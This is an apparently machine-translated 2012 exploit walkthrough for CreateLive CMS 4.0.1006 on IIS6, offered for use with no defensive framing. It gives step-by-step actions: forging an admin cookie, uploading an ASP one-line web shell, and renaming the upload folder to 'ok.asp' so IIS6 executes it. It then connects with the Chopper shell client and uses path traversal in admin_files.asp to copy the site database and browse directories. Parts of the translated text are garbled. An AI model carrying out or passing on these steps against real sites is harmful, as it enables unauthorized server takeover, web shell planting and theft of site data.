title:createlivecmsv4.0 vulnerability, no background get shell--2012-03-06 17:28
Title: createlive CMS Version 4.0.1006 Vulnerability without background Get shell
Required environment: IIS6, upload directory executable script
Createlive CMS Version 4.0.1006 is a very old drop cms.
--------------------------------------------------------------------------------------------------------------- --------------------------------
When I got a very old station, I found out that it was createlive CMS version 4.0.1006.
Find a hole in the tangle of holes.
Register a user, log in.
Modify Cookie:usergroupid=1&password=798fb0743e519ec0&username=admin&userid=1
Save cookies, open
Http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0
The value of the ID is changed as required.
Upload a copy of the ASP in a word
View File directory
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=main&filetype=select&channelid=2& Thisdir=. /photo/2012-3
Change Folder name
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=rname&filetype=select&channelid=3& Folderid=2012-3&newname=ok.asp
View under Success No
Chopper connection
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=rname&filetype=select&channelid=3& Fileid=. /.. /data/%23cl_count.mdb&newname=ok
Copy the database file from the other directory to the current directory with the file name Ok.mdb
http://xxx.xxx.xxx.xxx/dlugis/admin/admin_files.asp?action=main&filetype=select&channelid=2& Thisdir=. /.. /.. /
Browse Catalogs
CreateLiveCMSV4.0 vulnerability, no background get shell required